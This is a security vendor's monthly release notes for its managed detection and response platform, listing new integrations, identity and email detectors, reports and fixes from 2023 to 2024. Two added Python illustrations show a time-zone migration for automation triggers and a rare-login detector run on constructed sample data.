Red Canary Release Notes
    • 11 Dec 2024

    Note: This page does not include updates to the Linux EDR sensor. For information about updates to the Linux EDR sensor, see the Linux EDR Sensor Release Notes page.

    November 2024

    New/Updated Features

    Red Canary Security Data Lake
    The new Security Data Lake product is a managed storage solution for Red Canary customers that offers cost-effective, long-term storage for high-volume security logs. With Security Data Lake you can store data as long as needed, retrieve data without the wait or fees imposed by traditional cold storage, and meet your log retention compliance requirements - all without the high storage costs of a SIEM or the expense of building an in-house data lake.

    Security Data Lake works with a wide range of security products, ingesting data from almost any log source that is line-delimited and can be written to an AWS S3 bucket or forwarded via syslog. For more information, see Getting Started with the Security Data Lake.

    CrowdStrike Falcon Identity Protection Integration
    Red Canary now supports CrowdStrike’s Falcon Identity Protection module. Detections impacting Entra ID, Office 365, Okta, and traditional Active Directory deployments are analyzed and investigated via flow investigations, minimizing false-positive alerts and surfacing threats against critical identity infrastructure. For more information, see Integrate CrowdStrike Falcon Identity Protection with Red Canary.

    Expanded Alert State Sync Options
    Red Canary now features more granular user control over which alerts are automatically closed in external alert sources, allowing you to further review the alert in your source platform if desired. You can separately enable state sync for different alert levels, or when a threat is published. We’ve also added a comment sync option to all Microsoft integrations, which adds comments to your source platform informing you of any work that Red Canary is doing on the alert. Finally, the audit log now tracks when alerts are closed due to state sync.

    This change applies to all Red Canary integrations that currently support state sync, including Microsoft Defender, Microsoft Sentinel, Microsoft Graph v2, CrowdStrike Falcon Insight EDR, Palo Alto Cortex XDR, and SentinelOne Singularity. For more information, see Synchronize Alert Status and Comments from Red Canary to Alert Platforms.

    New “Login Guard” Identity Detectors
    We’ve deployed the first of a new set of analytics which are intended to detect credential compromise for customers who use Entra ID or Okta. These detectors flag logins from ISPs or VPNs that differ from a user’s typical activity patterns, which is often a signal that the credentials are being used by someone other than their normal owner. When anomalous behavior is detected, the resulting events are subjected to Red Canary’s automated flow investigations, which cut down on false positives and add rich context to the threats before they’re published.

    Red Canary MDR on Palo Alto Networks Cortex XSIAM - Early Access
    In August, Red Canary signed a groundbreaking agreement with Palo Alto Networks to develop a Managed XSIAM service offering. We’re now thrilled to announce that our Early Access (EA) release is live and ready to onboard the first customers.

    For more information about the EA or GA phases of Red Canary MDR on XSIAM, please contact your Red Canary Customer Success Manager.

    Improved Support for International Time Zones in Automation
    The triggers in Red Canary’s Automation feature now use an expanded list of region-based time zones to better support our international customers and to create a consistent experience for customers in regions that observe Daylight Saving Time. These changes do not require any action on your part. All existing triggers will be automatically re-mapped to the new representation of the time zone. For example:

    MST "Mountain Time (US & Canada)" => "America/Denver"
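    The following is an added example, not Red Canary code, showing why a trigger keyed to a region-based zone such as America/Denver fires at a consistent local time while a fixed abbreviation like MST drifts by an hour for most of the year. Only the MST row of the mapping comes from the release note; the other rows follow the Rails ActiveSupport names, and the US DST rule is hard-coded so the script runs without a system time zone database.

```python
from datetime import date, datetime, time, timedelta, timezone

# Legacy Rails-style zone names (the old trigger representation) mapped to
# IANA zone IDs. Only the "Mountain Time" row is from the release note; the
# rest follow the Rails ActiveSupport mapping and are added for illustration.
LEGACY_TO_IANA = {
    "Mountain Time (US & Canada)": "America/Denver",
    "Pacific Time (US & Canada)": "America/Los_Angeles",
    "Eastern Time (US & Canada)": "America/New_York",
    "Arizona": "America/Phoenix",
}

# Standard UTC offset (hours) and whether the zone observes US DST.
# Hard-coded here so the example does not depend on the system tz database.
ZONE_RULES = {
    "America/Denver": (-7, True),
    "America/Los_Angeles": (-8, True),
    "America/New_York": (-5, True),
    "America/Phoenix": (-7, False),
}


def _nth_sunday(year: int, month: int, n: int) -> date:
    """Return the n-th Sunday of the given month (weekday(): Monday=0 ... Sunday=6)."""
    first = date(year, month, 1)
    offset = (6 - first.weekday()) % 7
    return date(year, month, 1 + offset + 7 * (n - 1))


def us_dst_active(local: datetime) -> bool:
    """US rule since 2007: DST runs from 02:00 on the second Sunday of March
    until 02:00 on the first Sunday of November, judged on local wall-clock time."""
    start = datetime.combine(_nth_sunday(local.year, 3, 2), time(2, 0))
    end = datetime.combine(_nth_sunday(local.year, 11, 1), time(2, 0))
    return start <= local < end


def utc_offset(zone: str, local: datetime) -> timedelta:
    """Offset from UTC for a region-based zone at the given local wall-clock time."""
    std_hours, observes_dst = ZONE_RULES[zone]
    shift = 1 if observes_dst and us_dst_active(local) else 0
    return timedelta(hours=std_hours + shift)


def trigger_fire_time_utc(local: datetime, zone: str) -> datetime:
    """UTC instant at which a trigger scheduled for `local` in `zone` fires."""
    return (local - utc_offset(zone, local)).replace(tzinfo=timezone.utc)


def fixed_offset_fire_time_utc(local: datetime, std_hours: int) -> datetime:
    """The drift case: treating an abbreviation such as MST as a fixed -07:00 all year."""
    return (local - timedelta(hours=std_hours)).replace(tzinfo=timezone.utc)


def migrate_trigger(legacy_zone: str) -> str:
    """Re-map a legacy trigger zone name to its IANA ID, as the release note describes."""
    return LEGACY_TO_IANA[legacy_zone]


def fire_time_utc_str(local_iso: str, zone: str) -> str:
    """String convenience wrapper: local ISO wall-clock time -> 'YYYY-MM-DDTHH:MMZ'."""
    fired = trigger_fire_time_utc(datetime.fromisoformat(local_iso), zone)
    return fired.strftime("%Y-%m-%dT%H:%MZ")


if __name__ == "__main__":
    zone = migrate_trigger("Mountain Time (US & Canada)")  # America/Denver
    for local in (datetime(2024, 1, 15, 9, 0), datetime(2024, 7, 15, 9, 0)):
        region = trigger_fire_time_utc(local, zone)
        fixed = fixed_offset_fire_time_utc(local, -7)
        print(f"{local:%b %d} 09:00 local: {zone} fires {region:%H:%M}Z, "
              f"fixed MST fires {fixed:%H:%M}Z")
```

    In production, resolve offsets through the IANA database (Python's zoneinfo module) rather than a hand-coded rule; the rule is inlined here only to keep the example self-contained.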

    API Improvements
    We’ve improved the Threat Timeline API endpoint (/openapi/v3/detections/{id}/timeline) to include 14 new types of timeline content, bringing the API into alignment with the data already available in the Red Canary portal. The response now contains granular details for the following Threat Timeline categories:

    • Endpoint activity details

    • Process activity details

    • Correlated alert details

    • Network connection details

    • Analyst comments on activities

    • IP enrichment

    • Geolocation

    • Identity changes

    • Resource activity

    • Workload activity

    • Email activity

    • Login attempt

    • MFA challenges

    • User behaviors

    Note that this change is backward compatible. Existing API calls will automatically contain the newly supported information. See our API Documentation for a full list of the available Red Canary REST API resources.

    Fixed Issues

    State Sync
    We’ve resolved an issue that could cause alerts to be improperly reopened in certain circumstances.

    New Documentation

    October 2024

    New/Updated Features

    Threat Hunt Reports Page
    You can now view Threat Hunt Reports on a dedicated page in the Red Canary portal. Here are the highlights of this much-requested feature:

    • The reports contain full information about hunt strategy (how and what our Threat Hunting team looked for), what we observed, and our recommendations for mitigation

    • Newly-published reports will appear in the activity feed

    • You can easily distribute copies of the reports around your organization

    For more information, see Threat Hunt Reports.

    Trend Micro Vision One Integration
    Trend Micro Vision One support is now available in Red Canary to all customers with MDR Endpoint licensing. This feature-rich EDR integration includes:

    • EDR telemetry that enables threat detection on our vast library of detection analytics

    • Support for remediation response actions via Automate

    • Threat hunting capabilities

    • Alerts

    For more information, see the Trend Micro integration instructions.

    Red Canary Plugin for Microsoft Copilot for Security
    Our plugin for Microsoft Copilot - in preview since the Spring - has now been moved to GA. To learn more about how this plugin and partnership puts Red Canary on the cutting edge of delivering GenAI-enhanced MDR for Microsoft customers, read our blog post. For instructions and docs, check us out in Microsoft’s documentation. And if you want to see the source code, grab our Github repo.

    Integrations Page UI Changes
    We’ve made some improvements to the Integrations UI in Red Canary:

    • On the main Integrations page, the “Looking for something else?” link has been replaced with an easier-to-find “Add Integration” button

    • The Add Integration and Edit Integration pages now have clearer status icons and we’ve adjusted the location of the buttons to be consistent across all integration types

    New Documentation

    September 2024

    New/Updated Features

    Automatically Create Unwanted Software Exclusion Rules From Threats
    We’re making it easier to manage Unwanted Software threats. When a customer selects “I prefer not to see threats for this” for the Unwanted Software remediation state, an exclusion rule will be automatically created on the Applications page based on the selected criteria (endpoint, user, sensor group, etc.). This enhancement simplifies the workflow and removes the need for a separate step to create exclusions manually. For more information, see this page.

    New Reports Available in the Portal
    We’re excited to announce that two new reports are live! These data-driven reports are designed to help you better understand and showcase the value of Red Canary to your organization.

    • Top Observed Profiles Report: This report helps customers quantify the number of Intelligence Profile-associated threats to help justify security policies and measure trends over time. It includes two versions of the report: one focused on Tools and one focused on Groups. These reports are designed to provide insights into the threat landscape as it pertains to each organization, its industry, and all Red Canary customers.

    • Integrations by the Numbers Report: This report provides detailed insight into how each integration contributes to Red Canary’s detection capabilities by tracking data collection, alerts ingested, and threats detected. Select up to two MDR-supported integrations to compare.

    Fixed Issues

    Analytic Matches Count for Identity and Cloud Events
    We’ve resolved an issue with the “By The Numbers” report, where Analytic Matches were not being counted for Identity or Cloud events, leading to discrepancies in match counts. This fix ensures that Analytic Matches are now accurately represented across all event types. Customers may notice an increase in their match counts, reflecting a more precise view of Red Canary’s analytic capabilities.

    August 2024

    New/Updated Features

    Entra ID Telemetry Integration
    We’ve expanded our identity threat detection capabilities with the new Microsoft Entra ID integration. This integration allows us to access and analyze a broader range of Entra ID events in near real-time, enhancing your overall security visibility and response.

    Enhanced Okta Workforce Identity Telemetry Collection
    We’ve made significant improvements to our Okta Workforce Identity telemetry collection, providing more detailed and timely data to enhance your security posture. This upgrade ensures that your identity-related alerts are based on the most comprehensive and up-to-date information available.

    New Supported Sources for Red Canary Copilot Alert Summarization
    This feature helps you better understand the context of your alerts, provides recommendations for response, and highlights the critical data points that guided our investigation. Supported alert sources now include:

    • VMware Carbon Black Cloud Endpoint Standard

    • Crowdstrike Falcon Insight: EDR

    • Jamf

    • Microsoft ATP API Poll Alerts

    • Microsoft Defender for Identity v2

    • Microsoft Defender for Endpoint v2

    • Microsoft Entra ID Identity Protection v2

    • Palo Alto Networks Cortex XDR Alerts

    • Palo Alto Networks Threat Prevention

    • SentinelOne Singularity

    • Amazon GuardDuty

    • Fortinet FortiGate (NGFW)

    • Proofpoint Targeted Attack Protection (TAP)

    • Okta Workforce Identity

    Timeline Tabs for Threat Metadata
    We’ve introduced a new feature on the Threat timeline: Timeline Tabs. This enhancement provides you with a clearer and more organized view of your threat metadata. Each timeline entry now includes two clickable tabs:

    • Details Tab: This tab displays standard information, as well as additional Cloud Provider data such as process names and network IP addresses.

    • Location Tab: This tab stores metadata about where the threat occurred, including endpoint details, Kubernetes (K8s) info, container information, and cloud instance provider details.

    Ephemeral Server Counting Update
    Starting this month, we’re updating how we count ephemeral servers in heavily dynamic environments. Instead of counting every unique server, we’ll now calculate the server count based on a monthly average. This change applies to new Red Canary customers and those with a Cloud SKU, helping to prevent unexpected licensing overages.

    EDR Tenant Names on Hover
    We’ve introduced a simple popover feature that displays the name of the external service when you hover over the EDR logo to make it easier for customers with multiple EDRs of the same type. This update helps you quickly identify which tenant corresponds to each EDR instance.

    Precursor Labels
    Our Intelligence team has enhanced our ability to identify and communicate “precursor” activities - behaviors that often precede more serious threats like ransomware. By labeling these activities as precursors, we can provide more accurate threat assessments and better metrics on how often these activities escalate.

    Consolidated Retrospectives in Red Canary Readiness
    Readiness Exercises Retrospectives now have one unified feedback field and maturity dropdown per skill, rather than per discussion question. This consolidated experience enables teams to more effectively review and provide feedback to help them continuously improve their ability to respond.

    Fixed Issues

    Inactive Subdomains and Alert Backlog Handling
    We’ve changed the way Red Canary handles alerts for inactive subdomains to prevent backlogs and improve the timeliness of alert processing. Now, when a subdomain is reactivated, we will only process alerts from the time of reactivation forward, ensuring that old alerts are not processed.

    “Detected Threats” Report Fix
    We’ve fixed a bug in the calculation of the Median Time to Remediate (MTTR) in the “Detected Threats: How timely were we at remediating them?” report. The updated report now accurately reflects MTTR values and replaces the “-” value with “<1” when the calculated time is less than one day.

    New Documentation

    Support Center and Documentation Site Redesign
    We’re excited to announce the launch of our redesigned Red Canary Support Center and Documentation site! The new site separates product documentation from support ticketing and knowledge base articles, making it easier for you to find the information you need. Please update any bookmarks you have.

    July 2024

    New/Updated Features

    Alerts Timeline
    To improve activity display consistency in the Alerts timeline and resolve an issue with incorrect timestamps on some activities, some entries that previously appeared at the very end might now appear closer to the end (but with the correct timestamp).

    New Documentation

    June 2024

    New/Updated Features

    GenAI for Identity Flow Investigations
    We’ve introduced GenAI agent flows to help us evaluate large volumes of complicated alerts, make good decisions, and explain those decisions clearly. We’ve also tripled the number of alerts investigated as events, and our mean time to publish a threat has dropped by 60 percent without quality degradation. We now have both GuardDuty and Entra integrations using these new flow investigations. For more information, see Accelerating identity threat detection and response with GenAI.

    User and Entity Behavior Analytics (UEBA) Detectors
    For the first time in Red Canary’s history, we have detectors that use dynamically-populated prevalence indexes per subdomain, which means we can find activity unique to a particular user. These new user behavior detectors look for successful rare VPN, ISP, and device logins, based on what is normal in a user's environment.
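    The following is an added illustration of the per-subdomain prevalence approach described here and in the November 2024 “Login Guard” note; it is not Red Canary’s detector. It builds a per-tenant, per-user index of the ISPs and devices seen in successful logins, flags a successful login whose ISP or device is rare for that user, and withholds judgement until a user has a minimum baseline. The event schema, the thresholds and the sample telemetry are all constructed for the example.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Login:
    ts: datetime
    subdomain: str   # customer tenant; prevalence is never shared across tenants
    user: str
    isp: str         # assumed already resolved from the source IP by enrichment
    device: str
    success: bool


# Tunables (constructed for the example, not Red Canary's values).
MIN_BASELINE = 10    # successful logins a user needs before rarity is judged
RARE_SHARE = 0.05    # an ISP/device seen in under 5% of a user's logins is rare


class PrevalenceIndex:
    """Per-(subdomain, user) counters, populated dynamically as events stream in."""

    def __init__(self) -> None:
        self._isp = defaultdict(Counter)
        self._device = defaultdict(Counter)
        self._total = Counter()

    def baseline(self, login: Login) -> int:
        return self._total[(login.subdomain, login.user)]

    def share(self, login: Login, attr: str) -> float:
        """Fraction of this user's past successful logins that used the same ISP/device."""
        key = (login.subdomain, login.user)
        total = self._total[key]
        if total == 0:
            return 0.0
        table = self._isp if attr == "isp" else self._device
        return table[key][getattr(login, attr)] / total

    def learn(self, login: Login) -> None:
        key = (login.subdomain, login.user)
        self._isp[key][login.isp] += 1
        self._device[key][login.device] += 1
        self._total[key] += 1


def detect_rare_logins(events):
    """Return findings for successful logins that are rare for the user.

    Events are processed in time order and each one is learned only after it has
    been judged, so the index is 'what was normal before this login'."""
    index = PrevalenceIndex()
    findings = []
    for login in sorted(events, key=lambda e: e.ts):
        if not login.success:
            continue  # only successful logins are judged and only they build the baseline
        if index.baseline(login) >= MIN_BASELINE:
            rare = [a for a in ("isp", "device") if index.share(login, a) < RARE_SHARE]
            if rare:
                findings.append({"ts": login.ts.isoformat(), "subdomain": login.subdomain,
                                 "user": login.user, "rare": rare,
                                 "isp": login.isp, "device": login.device})
        index.learn(login)
    return findings


def sample_events():
    """Constructed sample telemetry for one tenant; not real customer data."""
    t0 = datetime(2024, 6, 1, 9, 0)
    events = [Login(t0 + timedelta(days=d), "acme", "alice",
                    "Example Cable Co", "alice-laptop", True) for d in range(12)]
    # alice then succeeds from a hosting/VPN provider she has never used
    events.append(Login(t0 + timedelta(days=12, hours=3), "acme", "alice",
                        "Example VPN Hosting", "alice-laptop", True))
    # a failed attempt from yet another network is ignored by the detector
    events.append(Login(t0 + timedelta(days=12, hours=4), "acme", "alice",
                        "Example Mobile LTE", "unknown-android", False))
    # bob has only three logins, so his new ISP is not judged yet (baseline too small)
    events += [Login(t0 + timedelta(days=d), "acme", "bob", isp, "bob-laptop", True)
               for d, isp in enumerate(["Example Cable Co", "Example Cable Co",
                                        "Example VPN Hosting"])]
    return events


if __name__ == "__main__":
    for finding in detect_rare_logins(sample_events()):
        print(finding)
```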

    GenAI Alert Summarization Beta Launch
    We have a new BETA UI feature that summarizes an individual alert with everything we know or have done with that alert. This update backs up our investigation, offers suggested next steps, and is available in Red Canary to try right now. The following alert integrations are supported today:

    • Endpoint

      • Crowdstrike Falcon Insight: EDR

      • Microsoft Defender for Endpoint v2

      • Palo Alto Cortex XDR Alerts

      • SentinelOne Singularity

      • VMware Carbon Black Cloud Endpoint Standard

      • Jamf Pro/Protect

    • Identity

      • Microsoft Entra ID Identity Protection v2

      • Microsoft Defender for Identity v2

    • Cloud

      • AWS GuardDuty

    Red Canary Copilot Integration with Microsoft’s Copilot
    Earlier this year we built a plugin for Microsoft’s Copilot and recently Microsoft released our plugin globally to all Microsoft Security Copilot customers.

    Threat Detection
    We’ve made the following improvements to our Threat Detection capabilities:

    • Six new intelligence profiles introduced, including Sugarghost, Cuckoo Stealer, Storm-1811, WARMCOOKIE, EditBot, and Cleanuploader.

    • Five new insights published, including the High Volume of ChromeLoader activity stemming from PDF Installer Lures, Open With Notepad: Protecting Users By Changing Default Behavior, and Voice phishing campaign leads to Black Basta.

    • Trend Micro EDR discovery and MVP translators have been completed. We can now generate tip-offs from Trend Micro EDR data.

    Readiness Exercise Improvements
    We’ve made the following improvements to our Readiness Exercises:

    • Updated two scenarios that include customizable fields and media prompts (“Are we ready for ransomware?” and “Compromised Third-Party Software”)

    • Added support for free-form attendee input during exercise set-up so that participants can be defined regardless of their subdomain user status

    • Added new readiness subdomain user roles to allow MDR and Readiness users more flexibility in managing users across the two products within the same subdomain

    • Introduced archiving and search for the Exercises and Action pages

    New Entra and Okta Data Standardization
    The standardized Okta data has unblocked one detector, which searches for users attempting to access the Okta admin console.

    New Identity Enrichment
    We’ve added new identity enrichment fields to increase our ability to catch threats.

    New Email Detectors
    Three new email detectors are looking for suspicious activity in user email mailboxes.

    Fixed Issues

    Identity Tag UI Update
    Users can now create exclusions for identity tags. This update was a commonly requested feature enhancement that saves time so that identities don’t need to be individually excluded.

    New Documentation

    May 2024

    New/Updated Features

    Google Cloud Platform (GCP) Integration
    Integrate Google Cloud Platform (GCP) with Red Canary.

    New Documentation

    April 2024

    New/Updated Features

    MDR Detection Updates
    We’ve added the following new identity detectors:

    • ANY-LOGON-TOR
      This detector identifies any logon from a TOR node based on IP enrichment from the IP Quality Score.

    • IDENTITY-OKTA-MFA-TOR-LOGIN
      This detector identifies a successful MFA authentication sourcing from a TOR proxy IP address.

    • IDENTITY-LOGON-PERFECTDATA
      This detector identifies suspicious logins to the “PerfectData Software” Entra ID application, which may indicate a Business Email Compromise (BEC) attack.

    • IDENTITY-LOGON-EM-CLIENT
      This detector identifies suspicious logins to the “eM Client” Entra ID application, which may indicate a Business Email Compromise (BEC) attack.

    • EMAIL-RULE-CREATE-FRAUD-IP
      This detector identifies email rule creation from IP addresses associated with VPN/proxy services with a high fraud score according to IP enrichment data.

    More Okta Telemetry
    We’ve enhanced the standardization of logon attempt Okta event types and added the following new telemetry:

    • user.session.access_admin_app

    • user.session.start

    • user.authentication.auth_via_AD_agent

    • user.authentication.auth_via_IDP

    • user.authentication.auth_via_inbound_delauth

    • user.authentication.auth_via_inbound_SAML

    • user.authentication.auth_via_iwa

    • user.authentication.auth_via_LDAP_agent

    • user.authentication.auth_via_radius

    • user.authentication.auth_via_richclient

    • user.authentication.auth_via_social

    • user.authentication.authenticate

    • app.generic.unauth_app_access_attempt

    • application.policy.sign_on.deny_access

    Threat Detection
    We’ve made the following improvements to our Threat Detection capabilities:

    • New intelligence profiles: We have three new profiles, ten new hints, and eight new detection coverage gap issues, including requests to bolster detection for 8base ransomware, RCRU64 ransomware, Koi Stealer, Bundlebo, D3F@CK loader, and XZ util sshd backdoor. The Intel Team researched the Koi Stealer and Loader malware, resulting in a new profile, a new hint, a detection coverage gap issue, and 11 new intelligence profile associations on threats.

    • Forty-nine new detectors are available across Google Cloud Platform (GCP), Windows, macOS, Linux, Identity and Email.

    Copilot for Security Plugin Available for Microsoft Customers
    Red Canary is the first MDR/MSSP to have a plugin published with Microsoft Security Copilot. We’ll also be the first plugin to ship with promptbooks that integrate our plugin capabilities to automate investigation tasks across the Microsoft Copilot for Security datasets. Users who own both Red Canary and Microsoft Copilot for Security can access their Red Canary data via Microsoft Security Copilot’s chatbot interface. Microsoft Security Copilot is a tool for defenders that helps them easily access and synthesize data from Red Canary while in the Defender console. The plugin is available today.

    Customizable Scenarios for Readiness Exercises
    Our Readiness Exercises now support customizable scenario inputs that you can specify during the exercise setup stage. These inputs are then used to create more realistic incident triggers that show actual employee names, roles, and company tools currently in place at your organization.

    New Documentation

    March 2024

    New/Updated Features

    LEDR Update
    We’ve added functionality to our Linux EDR sensor to show you more metadata related to the location of your Kubernetes pods and containers. This update helps you locate assets, leading to faster threat response times.

    More AWS telemetry
    We’ve extended Software Asset Management (SAM) to support AWS telemetry around assumed roles, and a new translator was shipped to standardize this telemetry.

    More Cloud Metadata in Red Canary's automated emails
    The XDR team has added container-specific information to the emails that we send you via Automate, which helps streamline your response process for issues in your cloud environments.

    New Detectors
    We’ve deployed 44 new behavioral detectors.

    Fixed Issues

    Alert Timelines
    The XDR team fixed an issue where Alert Timeline entries were out of order.

    MDE Response Actions for Linux
    We’ve added isolation support for Linux users.

    Reporting Performance
    We’ve improved the Median Time to Remediation and Intelligence & Detection Engineering Reports. The reports previously took 7-12 seconds to load and now take just under 1 second.

    February 2024

    New/Updated Features

    Automated Response for Defender
    Red Canary now supports automated response actions via Defender for Endpoint targeting macOS and Linux systems. As a reminder, Red Canary Active Remediation does not currently support Linux on Defender or any sensor.

    New Documentation

    January 2024

    New/Updated Features

    Microsoft Azure Integration
    You can now integrate Red Canary with Microsoft Azure. For more information, see Integrate Microsoft Azure with Red Canary.

    UI Updates
    We’ve made the following improvements to the Red Canary UI:

    • New Intel Profile UI. Intelligence Profiles have officially converted from Early Access (EA) to General Availability.

    • New Status Checks UI. We have a new status check area that helps you know if your integrations are healthy, particularly if you have multiple integrations to monitor.

    • New User Protection Usage View. We’ve added a new view in Red Canary so you can compare your User Protection usage against what you’ve purchased.

    • SentinelOne Pivot in Red Canary. All SentinelOne users can now pivot via DeepLink to an individual SentinelOne alert from the Red Canary alert page. This update addressed an issue where finding the source alert in SentinelOne from Red Canary was extremely difficult. Additionally, this update provides parity with other EDRs.

    New/Updated Detectors
    We’ve deployed 33 new behavioral detectors that span cloud and endpoint. We’ve also updated 47 existing detectors.

    Enhanced Automation
    We’ve enhanced our automation around multi-source threats, combining AADIP and MDE AITM alerts.

    Readiness Scenario Improvements
    We’ve added a new scenario for triaging a Microsoft SQL Brute Force attack. Additionally, we improved the flow in scenarios, including Atomic Red Team testing with prerequisites/ART guidance outlined in the scenario details section to ensure the team is prepared to exercise the scenario.

    Fixed Issues

    MDE Response Actions for macOS (and soon Linux)
    We’ve added isolation support for MDE on macOS, and are implementing Active Remediation (AR) support as well.

    New Documentation

    December 2023

    New Documentation

    November 2023

    New/Updated Features

    New Detectors
    We’ve developed and deployed thirty-six new detectors across AWS, Azure, Linux, macOS, and Windows.

    New Intelligence Profile UI
    The new UI, available to Early Access users, features a more digestible presentation format so that we can continue to differentiate ourselves with our incredible Threat Intelligence content. The full GA release is set for early January.

    New Intelligence Profiles
    The Intelligence Team constantly updates our profiles based on the latest threats. This month, we added three new profiles and updated four existing profiles.

    New Scattered Spider Readiness Exercise
    We have a new readiness exercise to help our users prepare for one of today’s most challenging adversaries.

    Fixed Issues

    MDE Automate
    We’ve made several fixes to MDE’s Automate actions related to isolation, including Defender for Endpoint Isolation Cancellation. We also fixed an issue where users couldn’t cancel an isolation request for a device that was still pending isolation.

    New Documentation

    October 2023

    New/Updated Features

    New Intelligence Profiles
    The Intelligence Team created nine new Intelligence Profiles and updated fifteen Intelligence Profiles to provide additional threat context to our users. A notable new profile is Nitrogen, a malware family delivered via malvertising that often leads to follow-on activity.

    New Surveyor on Rails Tool
    The Threat Hunting Team recently released a new internal hunting tool called Surveyor on Rails. This tool allows our Threat Hunters to efficiently hunt across user environments as we investigate and seek to identify new threats. Surveyor on Rails has enabled the team to hunt across user environments in a fraction of the time that it used to.

    Wiz Update
    Red Canary has teamed up with Wiz as its first certified MDR partner. For more information, see our latest blog post on what’s coming up.

    Fixed Issues

    Automate On-demand Search
    We fixed an issue that prevented users from searching for the desired target to run an on-demand playbook against.

    Lacework Integration
    We’ve refactored the Lacework integration for improved reliability and performance.

    Portal SMS MFA
    Portal SMS MFA can now be disabled on a subdomain level.

    New Documentation

    September 2023

    New/Updated Features

    Thwarted Ransomware
    On 9/15/23 the night crew helped thwart a ransomware attack against one of our users. One of our Detection Engineers saw suspicious usage of the bitsadmin tool, determined this threat was likely a “hands-on-keyboard” situation, and coordinated a call across threat hunting specialists here at Red Canary. Ultimately this threat was confirmed, blocked, and attributed to the ALPHV/BlackCat ransomware affiliate.

    New Detectors
    Thirty-three new detectors were developed and deployed across Windows, macOS, Linux, AWS, and Identity.

    Readiness Exercises Updates
    We released ten new scenarios in the portal focused on Cloud and ICS readiness.

    Fixed Issues

    Forensics Package
    We addressed a known issue for users of this feature, as the forensic package required an overhaul for the majority of the EDRs for which we provide the capability. Users who have utilized the updated capabilities have reported a better experience.

    Microsoft Graph v2 Ingestion and Sync
    Due to a change in Microsoft’s data strategy, we had to navigate a back-office change with significant customer impact. We re-designed the way we ingest, delay, and queue data from Microsoft sources. This change improves the quality of data for these Microsoft products.

    Report Loading Errors
    We fixed known issues with high endpoint count users that would previously error out. These include the Collections Report and the By The Numbers Report.

    New Documentation

    August 2023

    New/Updated Features

    Amazon Web Services (AWS) GuardDuty Integration
    You can now integrate Red Canary with Amazon Web Services (AWS) GuardDuty across all accounts and regions within your AWS Organization. This new integration lets Red Canary assume a role in your AWS environment, eliminating the need for a dedicated IAM user. In addition, Red Canary will detect when a new account or region appears, and automatically begin collecting GuardDuty findings. For more information, see Integrate Amazon Web Services with Red Canary.

    Data Is Column Added to the Integrations Table
    The integrations table now includes a Data Is column that describes the current status of your ingested data. This update gives you better insight into what Red Canary does with your data after ingestion.

    • Data will be stored and investigated
      Indicates that the data investigation has been assigned to Red Canary

    • Data will be stored
      Indicates that the data investigation has been assigned to the user

    For more information, see Integrations

    New Documentation

    July 2023

    New/Updated Features

    New Telemetry Added to Linux EDR sensor
    The Linux EDR sensor now collects Scriptload and file modification telemetry. Collecting these types of telemetry enables you to gain deeper insights into potential threats. For more information, see Release v1.5.0 and Release v1.5.1.

    • Scriptload Telemetry

      The Linux EDR sensor now collects the contents of scripts that start with a shebang (#!), ensuring we have granular visibility into script execution within environments protected by Linux EDR. With this valuable information, Red Canary identifies and analyzes potentially malicious scripts and detects script-based attacks.

    • File Modification Telemetry

      The Linux EDR sensor offers real-time visibility into any changes (creates, writes, deletes) made to critical system files. Red Canary quickly identifies unauthorized alterations and detects file-based attacks by capturing these modifications.

    With these enhanced telemetry capabilities, the Linux EDR sensor becomes an even more powerful ally in your security arsenal. This telemetry will be collected regardless of user subscription (CWP or Linux EDR).

    Fixed Issues

    Corrected Alert and Telemetry Information
    The Integrations page now shows the correct Alert and Telemetry information in the appropriate columns. This data provides insight on the amount and type of information that Red Canary is receiving from your third-party alert source. For more information, see Integrations.

    New Documentation

    June 2023

    New/Updated Features

    Integration UI Improvements
    The Red Canary Integration section is now easier to locate. From your Red Canary homepage, click Integrations to be taken to our main Integrations page. Start by typing in the name of your third-party security source, or scroll through the list to find the correct source. For more information, see Supported Integrations.

    New Events API Information
    Red Canary’s Events API now includes MITRE ATT&CK Tactics, Techniques, and Procedures (TTP) identifier information. You can easily extract TTP data, allowing you to discover what types of adversary motives and techniques your network is most vulnerable to, and security weaknesses that can be exploited.

    New Documentation

    May 2023

    New/Updated Features

    Automatically Close SentinelOne Alerts
    SentinelOne alerts reviewed by Red Canary’s Cyber Incident Response Team (CIRT) now close automatically. The alert's status and any closing comments made by Red Canary are written back to the SentinelOne console, giving a consistent view across the two integrated platforms.

    Automatically Close Cortex Alerts
    Cortex alerts reviewed by Red Canary’s CIRT now close automatically. The alert's status and any closing comments made by Red Canary are written back to the Cortex console, giving a consistent view across the two integrated platforms.

    Additional Analyst Context for SentinelOne alerts
    Red Canary now automatically adds analyst context to SentinelOne alerts that have been reviewed by Red Canary’s CIRT. Any notes made by Red Canary’s analysts during the review and disposition of a SentinelOne alert now appear as a Note attached to the corresponding Incident in the SentinelOne console. This lets you see why the Red Canary team gave an alert a particular disposition.

    Remove Data Loss Prevention (DLP) Alerts from Microsoft Graph v2 Integrations
    Data Loss Prevention (DLP) alerts from Microsoft Graph v2 integrations will no longer be ingested by Red Canary. This alert source lacked sufficient security context for Red Canary to review and will require you to review future instances.

    SentinelOne Ban Binary Response Actions Standardized on SHA1 Hashes
    Red Canary's integration with SentinelOne for Ban Binary response actions now standardizes on SHA1 hashes, so bans behave consistently when SentinelOne is your EDR platform and you can respond quickly to confirmed threats. Note that a hash cannot be converted between algorithms: to ban a binary you know only by its SHA256 (for example, from a threat report), you need the file itself, or SentinelOne's own record of it, to obtain the SHA1.

    Adjust the Jamf Isolation Group for SOAR Response Actions
    Red Canary now allows you to adjust the Jamf Isolation group chosen for SOAR response actions with Jamf Pro. This update allows for quick updates to the Jamf integration while maintaining quality isolation outcomes.

    April 2023

    Changes

    Red Canary Readiness Launched
    We’ve launched Red Canary Readiness, a new portfolio of offerings that gives teams a whole new way to train and prepare for incidents. The initial Readiness product is Readiness Exercises, a first-of-its-kind continuous learning platform that delivers realistic training, tabletops, and atomic testing in a single unified experience. For more information, see Red Canary Readiness.

    New Request Remediation Button
    Red Canary has added a new Request Remediation button which enables on-demand requests for remediation on a published High or Medium severity Threat. The goal of this feature is to make it easier for you to seek additional support in instances where:

    • An endpoint was tagged incorrectly or you opted to not tag it due to isolation concerns

    • You acknowledged (AR stop) but then reconsidered and now want Active Remediation (AR) intervention

    • You removed the endpoint from the network and need a way to notify the Active Remediation team when it's back online

    • You’ve discussed the threat with our Threat Hunting team and are now comfortable with the Active Remediation actions

    • You need to request AR actions on an old threat (prior to tagging) that generates additional activity without a substantial update

    New Documentation

    Readiness:

